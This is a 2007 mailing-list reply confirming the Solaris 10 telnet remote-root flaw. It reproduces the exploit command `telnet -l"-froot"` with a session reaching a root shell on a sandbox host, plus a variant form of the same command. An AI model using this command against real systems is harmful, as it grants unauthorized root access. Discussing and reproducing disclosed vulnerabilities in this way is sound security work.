[geeks] Solaris 10 Remote-Root Exploit
Doug McLaren
dougmc at frenzied.us
Mon Feb 12 11:43:48 CST 2007
On Mon, Feb 12, 2007 at 11:21:13AM -0600, Lionel Peterson wrote:
| Just a few datapoints - anyone recreate this yet?
Yes.
% telnet -l"-froot" sunspot
Trying 10.18.80.89...
Connected to sunspot.
Escape character is '^]'.
Last login: Fri Feb 9 14:37:41 from lenny.vignette.
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
==============================================================
Oracle 10.2.0.1.0
...
#
It also worked on different accounts as well.
Now, this box does allow telnets in as root (intentionally, as it's a
sandbox type box) so maybe that's relevant. It's probably not
anywhere near up to date on patches either.
(It also seems to work OK when done with a `telnet -l -froot sunspot',
for another data point.)
--
Doug McLaren, dougmc at frenzied.us
Kill -9 'em all, let root at localhost sort 'em out.
More information about the geeks
mailing list